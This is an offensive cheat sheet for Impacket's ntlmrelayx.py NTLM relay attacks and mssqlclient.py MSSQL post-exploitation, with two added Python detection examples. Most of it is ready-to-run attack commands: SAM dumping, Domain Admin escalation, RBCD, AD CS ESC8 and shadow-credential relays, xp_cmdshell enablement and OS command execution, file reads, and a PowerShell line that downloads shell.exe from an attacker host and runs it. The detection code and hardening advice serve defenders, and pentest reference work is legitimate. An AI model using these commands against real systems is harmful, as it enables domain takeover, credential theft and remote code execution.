Impacket: Relay and MSSQL
Quick Reference

| Tool | Purpose |
|---|---|
| ntlmrelayx.py | Relay captured NTLM authentication to SMB/LDAP/MSSQL/HTTP targets |
| mssqlclient.py | MSSQL TDS client: interactive shell, xp_cmdshell, file read |
ntlmrelayx.py
For every incoming NTLM authentication, relay it to one or more targets. Supports SMB, LDAP, MSSQL, HTTP, IMAP, and AD CS relay attacks.
Syntax:

```bash
ntlmrelayx.py [options] -t <target>
```
Common Usage:

```bash
# SMB relay: dump SAM (no command given = secretsdump)
ntlmrelayx.py -t smb://<target> -smb2support
# SMB relay: execute command
ntlmrelayx.py -t smb://<target> -smb2support -c <command>
# SMB relay: execute file
ntlmrelayx.py -t smb://<target> -smb2support -e /path/to/payload.exe
# SMB relay: interactive SMB shell (connect via netcat on port 11000)
ntlmrelayx.py -t smb://<target> -smb2support -i
# LDAP relay: dump LDAP info and attempt to add a DA
ntlmrelayx.py -t ldap://<dc-ip> -smb2support
# LDAP relay: set RBCD (delegate access for the relayed machine account)
ntlmrelayx.py -t ldap://<dc-ip> -smb2support --delegate-access
# LDAP relay: escalate a specific user to DA
ntlmrelayx.py -t ldap://<dc-ip> -smb2support --escalate-user <username>
# LDAP relay: dump LAPS
ntlmrelayx.py -t ldap://<dc-ip> -smb2support --dump-laps
# LDAP relay: dump gMSA
ntlmrelayx.py -t ldap://<dc-ip> -smb2support --dump-gmsa
# HTTP to SMB relay (WebDAV/NTLM auth on the HTTP port)
ntlmrelayx.py -t smb://<target> --no-smb-server --http-port 80 -smb2support
# Multiple targets from a file
ntlmrelayx.py -tf targets.txt -smb2support
# SOCKS proxy mode (reuse the session after relay)
ntlmrelayx.py -t smb://<target> -smb2support -socks
# CVE-2019-1040 (drop the MIC, relay signing-required connections)
ntlmrelayx.py -t smb://<target> -smb2support --remove-mic
# AD CS ESC8 relay: get a certificate for the impersonated user
ntlmrelayx.py -t http://<ca-host>/certsrv/certfnsh.asp --adcs --template User
# AD CS: relay a DC machine account for the DomainController template
ntlmrelayx.py -t http://<ca-host>/certsrv/certfnsh.asp --adcs --template DomainController
# Shadow Credentials relay
ntlmrelayx.py -t ldap://<dc-ip> --shadow-credentials --shadow-target <target-account>
# IPv6 listener
ntlmrelayx.py -t smb://<target> -smb2support -6
# Keep relaying (don't stop after the first success)
ntlmrelayx.py -t smb://<target> -smb2support --keep-relaying
# Store loot in a directory
ntlmrelayx.py -t smb://<target> -smb2support -l /tmp/loot
# Disable the SMB server (only listen on HTTP)
ntlmrelayx.py -t smb://<target> --no-smb-server --http-port 8080
```
Key Options:
- -t <target>: Relay target (smb://, ldap://, ldaps://, mssql://, http://)
- -tf <file>: File of relay targets
- -smb2support: Enable SMB2 (almost always needed)
- -c <command>: Command to run on the SMB target
- -e <file>: File to execute on the SMB target
- -i / --interactive: Launch an interactive shell (SMB/LDAP/SQL)
- -socks: SOCKS proxy mode (port 1080)
- -l <dir> / --lootdir <dir>: Directory for loot
- -of <file>: Output file for NTLMv2 hashes
- -dh / --dump-hashes: Show hashes in the console
- --remove-mic: Drop the MIC (CVE-2019-1040)
- --keep-relaying: Keep relaying after the first success
- --no-multirelay: Disable multi-host relay
- -ip <ip>: Bind interface IP
- --smb-port <port>: SMB listener port (default 445)
- --http-port <port>: HTTP listener port(s)
- -6 / --ipv6: Listen on IPv6
- -wh <host> / --wpad-host <host>: Serve WPAD for proxy auth capture

LDAP-specific:
- --no-dump: Don't dump LDAP
- --no-da: Don't attempt to add a DA
- --no-acl: Disable ACL attacks
- --escalate-user <username>: Escalate a specific user via ACL
- --delegate-access: RBCD delegation on the relayed computer
- --dump-laps: Dump LAPS passwords
- --dump-gmsa: Dump gMSA passwords
- --dump-adcs: Dump AD CS info
- --add-dns-record <name> <ip>: Add a DNS record via LDAP

AD CS (ESC8):
- --adcs: Enable the AD CS relay attack
- --template <template>: Certificate template name
- --altname <name>: Subject Alternative Name (ESC1/ESC6)

Shadow Credentials:
- --shadow-credentials: Enable the shadow credentials attack
- --shadow-target <account>: Target account for msDS-KeyCredentialLink
- --export-type {PEM,PFX}: Certificate export format
- --cert-outfile-path <path>: Output path for the certificate
Notes:
- SMB signing must not be required on the target for SMB relay to work; a target that enforces signing rejects the relayed session
- Check with CheckLDAPStatus.py / DumpNTLMInfo.py before attacking
- SOCKS mode: after the relay, use proxychains with any tool against 127.0.0.1:1080
- Interactive mode: nc 127.0.0.1 11000 for the SMB shell
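Added detection example (not part of the original reference and not Impacket code): the relay patterns above leave a trace in Windows Security event 4624 as NTLM network logons (LogonType 3) whose source address belongs to the relay host rather than to the workstation named in the event, and as several distinct accounts authenticating from that one source in a short window. The event lines and the workstation-to-address inventory below are constructed, and the `Field=value` layout is an assumed simplification of the real event XML.

```python
"""Flag NTLM network logons that look relayed (constructed sample events)."""
import re
from collections import defaultdict

# Constructed 4624-style records: LogonType 3 = network logon.
SAMPLE_EVENTS = [
    "EventID=4624 LogonType=3 AuthPackage=NTLM Account=CORP\\alice Workstation=WS01 SourceIP=10.0.0.21",
    "EventID=4624 LogonType=3 AuthPackage=NTLM Account=CORP\\bob Workstation=WS02 SourceIP=10.0.0.99",
    "EventID=4624 LogonType=3 AuthPackage=NTLM Account=CORP\\WS03$ Workstation=WS03 SourceIP=10.0.0.99",
    "EventID=4624 LogonType=3 AuthPackage=Kerberos Account=CORP\\carol Workstation=WS04 SourceIP=10.0.0.24",
    "EventID=4624 LogonType=2 AuthPackage=NTLM Account=CORP\\dave Workstation=WS05 SourceIP=-",
]

# Constructed inventory: the address each workstation is expected to authenticate from.
INVENTORY = {"WS01": "10.0.0.21", "WS02": "10.0.0.22", "WS03": "10.0.0.23", "WS04": "10.0.0.24"}

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one 'Field=value ...' record into a dict."""
    return dict(FIELD_RE.findall(line))


def find_relay_suspects(lines, inventory, min_accounts=2):
    """Return (mismatches, shared_sources).

    mismatches: (account, workstation, source_ip) for NTLM network logons whose
                source address is not the inventory address of the workstation.
    shared_sources: source_ip -> sorted accounts, for sources that authenticated
                as at least `min_accounts` different accounts (a relay box fans
                out every captured session from its own address).
    """
    mismatches = []
    accounts_by_source = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        # Only NTLM network logons can be relayed; interactive and Kerberos logons are noise here.
        if ev.get("EventID") != "4624" or ev.get("LogonType") != "3" or ev.get("AuthPackage") != "NTLM":
            continue
        workstation, source = ev.get("Workstation"), ev.get("SourceIP")
        expected = inventory.get(workstation)
        if expected and source != expected:
            mismatches.append((ev["Account"], workstation, source))
        accounts_by_source[source].add(ev["Account"])
    shared = {
        src: sorted(accts)
        for src, accts in accounts_by_source.items()
        if len(accts) >= min_accounts
    }
    return mismatches, shared


if __name__ == "__main__":
    mismatched, shared_src = find_relay_suspects(SAMPLE_EVENTS, INVENTORY)
    for account, ws, src in mismatched:
        print(f"MISMATCH {account} claimed {ws} but came from {src}")
    for src, accts in shared_src.items():
        print(f"FAN-OUT  {src} authenticated as {', '.join(accts)}")
```

Both heuristics need a trustworthy inventory (DHCP leases or an asset database) and a tolerance for legitimate multi-user hosts such as terminal servers. The only fix for the underlying exposure is enforcing SMB signing on servers and LDAP signing plus channel binding on domain controllers, which makes the relayed session fail; the check above catches attempts where that has not yet been done.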
mssqlclient.py
TDS client for Microsoft SQL Server: interactive SQL shell with support for xp_cmdshell, file operations, and linked server abuse.
Syntax:

```bash
mssqlclient.py [options] <domain>/<username>:<password>@<target>
```
Common Usage:

```bash
# Connect with SQL auth
mssqlclient.py <username>:<password>@<target>
# Connect with Windows auth
mssqlclient.py -windows-auth <domain>/<username>:<password>@<target>
# Pass-the-Hash (Windows auth)
mssqlclient.py -windows-auth -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>
# Kerberos (ccache)
KRB5CCNAME=<ticket> mssqlclient.py -k -no-pass -windows-auth <domain>/<username>@<target>
# Specific database
mssqlclient.py <username>:<password>@<target> -db master
# Custom port
mssqlclient.py <username>:<password>@<target> -port 1434
# Run a command directly (non-interactive)
mssqlclient.py <username>:<password>@<target> -command "SELECT @@version"
```
Shell Commands (once connected):

```sql
-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- Execute OS command
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell '<command>';
-- Read file (requires BULK INSERT permissions)
SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS Data;
-- Read file via xp_cmdshell
EXEC xp_cmdshell 'type C:\Users\Administrator\Desktop\root.txt';
-- Write file (via xp_cmdshell)
EXEC xp_cmdshell 'echo test > C:\Windows\Temp\test.txt';
-- List linked servers
SELECT name FROM sys.servers;
-- Execute on linked server
EXEC ('EXEC xp_cmdshell ''whoami''') AT [<linked-server>];
-- Check current user and privileges
SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin');
-- List databases
SELECT name FROM sys.databases;
-- Check users
SELECT name, type_desc FROM sys.server_principals;
```

Impacket shell helper commands:
- enable_xp_cmdshell: Enable xp_cmdshell in one command
- xp_cmdshell <command>: Run an OS command
Options:
- -windows-auth: Windows/domain authentication (default: SQL auth)
- -hashes <lm-hash>:<nt-hash>: NTLM hash auth (requires -windows-auth)
- -k with -no-pass: Kerberos via ccache (KRB5CCNAME)
- -aesKey <aes256-key>: AES Kerberos key
- -dc-ip <dc-ip>: DC IP (for Kerberos)
- -target-ip <target>: Target IP override
- -port <port>: MSSQL port (default: 1433)
- -db <db>: Database to connect to
- -command <cmd>: SQL command(s) to run non-interactively
- -file <file>: File of SQL commands to run
- --host-name <name>: HostName property in the connection string
- --app-name <name>: AppName property in the connection string
- -show: Print queries as they run
Download a file to the target via xp_cmdshell (the target pulls it from an attacker-hosted HTTP server; the original `IEX(...)` wrapper is removed because `DownloadFile` returns nothing for Invoke-Expression to evaluate):

```sql
-- PowerShell download on the target
EXEC xp_cmdshell 'powershell -c "(New-Object Net.WebClient).DownloadFile(''http://<attacker>/shell.exe'',''C:\Windows\Temp\shell.exe'')"';
EXEC xp_cmdshell 'C:\Windows\Temp\shell.exe';
```
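Added detection example covering the shell commands and the download step above (not part of the original reference and not Impacket code): every statement in those sections is visible to SQL Server Audit or an Extended Events session capturing `sql_batch_completed`, so a defender can classify exported statements by the same patterns the cheat sheet uses. The login/statement rows below are constructed; the rule names and severity levels are this example's own.

```python
"""Classify exported T-SQL statements by the xp_cmdshell / file-read / linked-server
patterns an MSSQL post-exploitation session leaves behind (constructed sample audit)."""
import re

# Constructed (login, statement) rows as a SQL Server Audit export might yield them.
SAMPLE_AUDIT = [
    ("svc_app", "SELECT name FROM sys.databases;"),
    ("svc_app", "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;"),
    ("svc_app", "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"),
    ("svc_app", "exec   XP_CMDSHELL 'whoami';"),
    ("report_ro", "SELECT * FROM OPENROWSET(BULK 'C:\\Windows\\win.ini', SINGLE_CLOB) AS Data;"),
    ("svc_app", "EXEC ('EXEC xp_cmdshell ''whoami''') AT [SQL02];"),
    ("svc_app", "EXEC master..xp_cmdshell 'dir';"),
]

# Each rule is (tag, regex). Matching is case-insensitive and tolerant of extra whitespace,
# since the Impacket helper and a typed statement spell the same thing differently.
RULES = [
    ("enable_advanced_options", re.compile(r"sp_configure\s+'show advanced options'\s*,\s*1", re.I)),
    ("enable_xp_cmdshell", re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    # Unquoted xp_cmdshell is an invocation; the quoted form inside sp_configure is excluded
    # by the lookarounds so the enabling statement is not double-counted as an execution.
    ("xp_cmdshell_exec", re.compile(r"(?<!')\bxp_cmdshell\b(?!')", re.I)),
    ("bulk_file_read", re.compile(r"OPENROWSET\s*\(\s*BULK\b", re.I)),
    # EXEC ('...') AT [server]: command pushed through a linked server.
    ("linked_server_exec", re.compile(r"\bEXEC\s*\(.*\)\s*AT\s*\[", re.I | re.S)),
]


def classify(statement):
    """Return the list of rule tags that match one statement, in RULES order."""
    return [tag for tag, rx in RULES if rx.search(statement)]


def score_logins(audit_rows):
    """Group matching statements per login and assign a severity.

    high:   the login both enabled xp_cmdshell and invoked it (the sequence above)
    medium: OS command execution, directly or via a linked server, without the enable step
    low:    anything else that matched (e.g. only a BULK file read)
    """
    findings = {}
    for login, statement in audit_rows:
        tags = classify(statement)
        if not tags:
            continue
        entry = findings.setdefault(login, {"tags": set(), "statements": []})
        entry["tags"].update(tags)
        entry["statements"].append(statement)
    for entry in findings.values():
        tags = entry["tags"]
        if "enable_xp_cmdshell" in tags and "xp_cmdshell_exec" in tags:
            entry["severity"] = "high"
        elif "xp_cmdshell_exec" in tags or "linked_server_exec" in tags:
            entry["severity"] = "medium"
        else:
            entry["severity"] = "low"
    return findings


if __name__ == "__main__":
    for login, entry in score_logins(SAMPLE_AUDIT).items():
        print(f"{login}: {entry['severity']} ({', '.join(sorted(entry['tags']))})")
        for stmt in entry["statements"]:
            print(f"    {stmt}")
```

A persistent control is stronger than the alert: leave `xp_cmdshell` disabled (`sp_configure 'xp_cmdshell', 0`), give application logins no `sysadmin` membership, grant `ADMINISTER BULK OPERATIONS` only where a job needs it, and review linked-server logins mapped to privileged accounts, since `EXEC ... AT` runs with whatever identity the link was configured with.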